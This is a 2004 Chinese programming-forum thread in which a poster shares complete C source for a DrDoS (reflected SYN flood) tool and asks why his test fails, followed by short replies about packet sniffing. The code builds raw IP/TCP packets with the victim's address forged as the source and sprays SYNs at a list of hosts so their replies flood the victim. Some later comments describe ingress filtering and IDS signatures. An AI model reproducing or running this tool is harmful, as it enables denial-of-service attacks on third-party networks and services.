论坛: 编程破解 标题: DrDoS[讨论] 复制本贴地址    
作者: SysHu0teR [syshunter]    版主   登录
根据TOMYCHEN提供的synflood改的DrDoS。郁闷,测试不成功。哪位精通TCP老兄给指点指点
代码:

//FileName:DRDos.c
//Author:Unknown
//Modify:Tomy.Chen
//last modify:SysHu0teR
//LastTime:2004-11-28 12:57
//Description:
//Synflood DoS attack; this version supports both Linux and Win32
//compiling on Linux requires the "pthread" library
//compiled on vc++ 6.0 and gcc 3.2.2
#include<stdio.h>
#ifdef WIN32
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"wsock32")

#else

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <pthread.h>
#include <errno.h>


#endif

/* Non-Windows builds: map the Win32 type, constant and error-function names
 * used throughout this file onto plain C / POSIX equivalents. */
#ifndef WIN32
#define USHORT        unsigned short
#define SOCKET        int
#define DWORD        unsigned long
#define UCHAR        unsigned char
#define HANDLE        int
#define INVALID_SOCKET  (SOCKET)(~0)
#define SOCKET_ERROR            (-1)
#define GetLastError()    errno
#define WSAGetLastError()    errno
#endif

/* Hand-rolled boolean; <stdbool.h> is not used by this file. */
#define bool int
#define true 1
#define false 0
// #define SERVER_IP "61.129.81.210"      // (author's note, translated) the so-called "large number of nodes" mentioned above -- changed
/* Base TCP sequence number; the SendSEQ counter is added to it for each packet,
 * so every packet's sequence number is derived from this one constant. */
#define SEQ 0x28376839
/* Banner printed with the usage text and again before the worker thread starts. */
#define LOG "===============Begin====================\n"
/* Forward declarations for the two helpers defined later in this file. */
USHORT checksum(USHORT *buffer, int size);
int flood();

/*
 * Fixed part of a TCP header, without options.
 * main() stores the ports, sequence number and window with htons()/htonl();
 * flood() rewrites th_seq and th_sum for every packet.
 */
typedef struct tcphdr
{
    USHORT th_sport;            /* source port */
    USHORT th_dport;            /* destination port */
    unsigned int th_seq;        /* sequence number */
    unsigned int th_ack;        /* acknowledgement number (left at 0 here) */
    unsigned char th_lenres;    /* header length in 32-bit words in the high nibble, low nibble 0 */
    unsigned char th_flag;      /* TCP flag bits; main() sets 2, the SYN bit */
    USHORT th_win;              /* advertised window */
    USHORT th_sum;              /* TCP checksum, filled in by flood() */
    USHORT th_urp;              /* urgent pointer (left at 0 here) */
}TCP_HEADER;

/*
 * IPv4 header without options. Because the socket is opened with IP_HDRINCL,
 * the program supplies this header itself instead of letting the kernel build
 * it -- including the source address field.
 */
typedef struct iphdr
{
    unsigned char h_verlen;         /* version in the high nibble, header length in the low nibble */
    unsigned char tos;              /* type of service (never assigned; zero as a global) */
    unsigned short total_len;       /* total datagram length, stored with htons() */
    unsigned short ident;           /* identification; main() sets the constant 1 */
    unsigned short frag_and_flags;  /* flags + fragment offset (0 here) */
    unsigned char  ttl;             /* time to live; main() sets 128 */
    unsigned char proto;            /* payload protocol; main() sets IPPROTO_TCP */
    unsigned short checksum;        /* header checksum, recomputed by flood() */
    unsigned int sourceIP;          /* source address as written by the program, not the sender's real one */
    unsigned int destIP;            /* destination address; replaced per list entry in flood() */
}IP_HEADER;

/*
 * Pseudo-header that flood() places in front of the TCP header while the TCP
 * checksum is computed. The struct type is anonymous; PSD_HEADER is the single
 * global instance of it.
 */
struct
{
    unsigned long saddr;    /* copied from ipheader.sourceIP */
    unsigned long daddr;    /* copied from ipheader.destIP */
    char mbz;               /* "must be zero" byte; set to 0 in main() */
    char ptcl;              /* protocol; set to IPPROTO_TCP in main() */
    unsigned short tcpl;    /* TCP length; htons(sizeof(tcpheader)) in main() */
}PSD_HEADER;

/* Process-wide state shared between main() and the flood() worker thread.
 * None of it is protected by a lock. */
#ifdef WIN32
WSADATA wsaData;                /* Winsock start-up data filled by WSAStartup() */
#endif
SOCKET  sockMain;               /* the raw socket every packet is sent on */
/* ErrorCode: last socket-call result; flag: value passed for IP_HDRINCL;
 * TimeOut: value passed for SO_SNDTIMEO (Win32 branch only);
 * ServerIpNet/ServerIpHost: referenced only from commented-out code;
 * dataSize: bytes handed to sendto(); SendSEQ: per-packet counter added to SEQ. */
int ErrorCode=0,flag=true,TimeOut=2000,ServerIpNet,ServerIpHost,dataSize=0,SendSEQ=0;        // changed
int    portNum=0;               /* port from argv[2]; used as the TCP source port */
unsigned short activPort=40000; /* referenced only from commented-out lines in flood() */
struct sockaddr_in sockAddr;    /* destination handed to sendto() */
TCP_HEADER  tcpheader;          /* TCP header template, patched per packet */
IP_HEADER  ipheader;            /* IP header template, patched per packet */
char        sendBuf[128];       /* scratch buffer: checksum staging, then the outgoing packet */

/*
 * One's-complement Internet checksum over a byte range.
 *
 * buffer: start of the data, read as consecutive 16-bit words.
 * size:   number of bytes to cover; a trailing odd byte is added on its own.
 *
 * Returns the bitwise complement of the folded 16-bit sum.
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long sum = 0;
    int remaining;

    /* Accumulate every complete 16-bit word. */
    for (remaining = size; remaining > 1; remaining -= sizeof(USHORT)) {
        sum += *buffer;
        buffer++;
    }

    /* A leftover byte contributes its value as-is. */
    if (remaining != 0) {
        sum += *(UCHAR*)buffer;
    }

    /* Fold the carries above bit 15 back into the low 16 bits, twice. */
    sum = (sum & 0xffff) + (sum >> 16);
    sum = sum + (sum >> 16);

    return (USHORT)(~sum);
}

/*
 * Entry point. Reads a target address and port from the command line, opens a
 * raw socket with IP_HDRINCL so the program writes its own IP header, fills
 * the global IP/TCP/pseudo-header templates, starts flood() on a worker thread
 * and then blocks on getchar().
 *
 * The IP source address is set to argv[1], i.e. the packets claim to come
 * from the target; hosts that answer the SYN reply to that address rather
 * than to the sender (a reflection attack).
 *
 * Defender notes:
 *  - Forged-source traffic like this is what source-address validation
 *    (BCP 38 / RFC 2827 ingress filtering, uRPF) is designed to drop at the
 *    network edge.
 *  - ident=1, ttl=128, window=65534, SYN-only flags and a sequence number of
 *    SEQ plus a small counter are the same in every packet, which gives a
 *    stable signature for IDS rules and packet captures.
 *
 * Returns 1 on bad usage, 2-5 on socket set-up failures, 0 otherwise.
 */
int main(int argc,char* argv[])
{
#ifndef WIN32
    pthread_attr_t attr;
    pthread_t tid;
#endif

    DWORD  dw;
    HANDLE hThread=0;
    char  putInfo;

    /* Exactly two arguments are accepted. The usage text also names an
     * <iplist_file>, but only argv[1] and argv[2] are read in this function;
     * flood() opens a hard-coded path instead. */
    if(argc!=3)
    {
        printf("%s\n",LOG);
        printf("Invalid command,Pls use:\n%s  <IP> <port> <iplist_file>\nExample:%s 192.168.100.244 80 ip.txt\n",argv[0],argv[0]);
        return 1;
    }
#ifdef WIN32
    if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
            printf("WSAStartup failed: %d\n",ErrorCode);
            return 2;
    }
#endif
    /* Raw socket: creating one normally requires administrator/root privileges. */
    sockMain=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);
    if(sockMain==INVALID_SOCKET)
    {
        printf("Socket failed: %d\n",WSAGetLastError());
        return 3;
    }
    /* IP_HDRINCL: the caller supplies the whole IP header, source address included. */
    ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
    if(ErrorCode==SOCKET_ERROR)
    {
        printf("Set sockopt failed: %d\n",WSAGetLastError());
        return 4;
    }
#ifdef WIN32
    ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
    if(ErrorCode==SOCKET_ERROR)
    {
        printf("Set sockopt time out failed: %d\n",WSAGetLastError());
        return 5;
    }
#endif
    portNum=atoi(argv[2]);          // (author's note, translated) which port of the IP to attack?

//    memset(&sockAddr,0,sizeof(sockAddr));
//    sockAddr.sin_family=AF_INET;
//    sockAddr.sin_addr.s_addr =inet_addr(SERVER_IP);
//    ServerIpNet=inet_addr(SERVER_IP);        // changed
//    ServerIpHost=ntohl(ServerIpNet);        // changed

    /* IP header template. Version 4 goes in the high nibble; the low nibble is
     * sizeof(IP_HEADER)/sizeof(unsigned long). */
    ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
    ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
    ipheader.ident = 1;
    ipheader.frag_and_flags = 0;
    ipheader.ttl = 128;
    ipheader.proto = IPPROTO_TCP;
    ipheader.checksum =0;
    ipheader.sourceIP = inet_addr(argv[1]); // (translated) the source address here is the address being attacked
    ipheader.destIP = inet_addr(argv[1]);        // (translated) in theory the destination is a network node; flood() overwrites it per list entry

    /* TCP header template: SYN only, destination port 80, source port = argv[2]. */
    tcpheader.th_dport=htons(80);        // (translated) send the packet to port 80 of the network node
    tcpheader.th_sport = htons(portNum);
    tcpheader.th_seq = htonl(SEQ+SendSEQ);
    tcpheader.th_ack = 0;
    tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
    tcpheader.th_flag = 2;
    tcpheader.th_win = htons(65534);//16384);
    tcpheader.th_urp = 0;
    tcpheader.th_sum = 0;

// (translated) the pseudo-header follows
    PSD_HEADER.saddr=ipheader.sourceIP;
    PSD_HEADER.daddr=ipheader.destIP;
    PSD_HEADER.mbz=0;
    PSD_HEADER.ptcl=IPPROTO_TCP;
    PSD_HEADER.tcpl=htons(sizeof(tcpheader));
    printf("%s\n",LOG);
#ifdef WIN32
    /* Worker is created suspended so its priority can be raised before it runs. */
    hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,CREATE_SUSPENDED,&dw);
    SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST);
    ResumeThread(hThread);
#else
    /* attr is initialised and given system scope, but pthread_create() below is
     * passed NULL for its attributes. hThread receives pthread_create()'s
     * return code, not a thread handle. */
    pthread_attr_init(&attr);
    pthread_attr_setscope(&attr, PTHREAD_SCOPE_SYSTEM);
    hThread = pthread_create(&tid,NULL,(void*)flood,NULL);
#endif

    printf("Warning[start]...........\nPress any key to stop!\n");
    /* Blocks until input arrives on stdin; the value read is not used. */
    putInfo=getchar();


#ifdef WIN32
    TerminateThread(hThread,0);
    WSACleanup();
#else
    /* pthread_exit() ends the calling thread and does not return, so the
     * statements after this #endif are not reached on this branch. */
    pthread_exit((void*)hThread);
#endif

    printf("\nStopd...........\n");

    return 0;
}

/*
 * Worker-thread routine. Loops forever: opens a hard-coded list file, and for
 * each whitespace-separated entry treats it as an IPv4 address, patches the
 * global header templates and sends one SYN packet to it on the raw socket.
 * The IP source address stays at the value main() took from argv[1], so any
 * SYN/ACK a listed host produces is addressed to that host, not to the sender.
 *
 * Works entirely on the file-scope globals (sockMain, sockAddr, ipheader,
 * tcpheader, PSD_HEADER, sendBuf, SendSEQ, dataSize, ErrorCode).
 *
 * Defender notes: a listed host sees an ordinary-looking SYN to port 80 from
 * the spoofed address; the spoofed host sees unsolicited SYN/ACK (or RST)
 * packets from many sources. Source-address validation at the sender's network
 * edge prevents the forged packets from leaving in the first place.
 *
 * NOTE(review): the fopen() and fscanf() results are not checked, and "%s" has
 * no field width for the 20-byte serverip buffer.
 *
 * Exits the thread with status 1 if the last sendto() of a pass failed; the
 * trailing return 0 is not reachable through the infinite loop.
 */
int flood()
{
    FILE *list;
    char serverip[20];

    while(1)
    {
        /* The list file is reopened and re-read on every pass of the outer loop. */
        list=fopen("d:\ip.txt","r");
        while(!feof(list)) {
            fscanf(list,"%s",serverip);

                                /* Advance the counter added to SEQ; reset to 1 once it has reached 65536. */
                                if(SendSEQ++==65536) SendSEQ=1;
        //if(activPort++==40010) activPort=1000;
        memset(&sockAddr,0,sizeof(sockAddr));
                    sockAddr.sin_family=AF_INET;
                    sockAddr.sin_addr.s_addr =inet_addr(serverip);
                                ipheader.checksum =0;
        ipheader.destIP = inet_addr(serverip);      // (translated) switch to this network node's IP
        tcpheader.th_seq = htonl(SEQ+SendSEQ);
        //tcpheader.th_sport = htons(activPort);
        tcpheader.th_sum = 0;
        PSD_HEADER.daddr=ipheader.destIP;          // (translated) same as above
        /* Stage pseudo-header + TCP header in sendBuf to compute the TCP checksum. */
        memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
        memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
        tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));

        /* Overwrite the staging data with the real packet: IP header, then TCP
         * header, then 4 zero bytes that are not counted in dataSize. */
        memcpy(sendBuf,&ipheader,sizeof(ipheader));
        memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
        memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
        dataSize=sizeof(ipheader)+sizeof(tcpheader);
        /* The IP checksum is computed over dataSize bytes (both headers), then
         * the IP header is copied into the buffer again with the result. */
        ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
        memcpy(sendBuf,&ipheader,sizeof(ipheader));
        ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
        /* Short pause between packets. */
        Sleep(1);
        }
        fclose(list);
        /* Only the result of the final sendto() of this pass is examined here. */
        if(ErrorCode==SOCKET_ERROR)
        {
            printf("\nCan't connect this IP!Pls check it.\n");
#ifdef WIN32
            ExitThread(1);
#else
            pthread_exit((void*)1);
#endif
        }
        // Sleep(1000);
    }
    return 0;
}



地主 发表时间: 04-12-19 14:41

回复: 286 [unique]   版主   登录
晕,什么现象?到哪里出问题了?


B1层 发表时间: 04-12-20 11:34

回复: TomyChen [quest]   版主   登录
自己开Sniffer抓包....还有,不一定是所有的机器都会返回SYN+ACK的

B2层 发表时间: 04-12-21 20:31

回复: SysHu0teR [syshunter]   版主   登录
TO:286
就是那个什么分布式反弹拒绝服务攻击。

当然抓包了,用本机测试可以收到SYN/ACK包(当然能收到),但是用两台机器测试,A伪装B地址发包,B就收不到包。A收到一大堆ARP的什么包,等这礼拜回家了把包信息贴上来

B3层 发表时间: 04-12-22 13:56
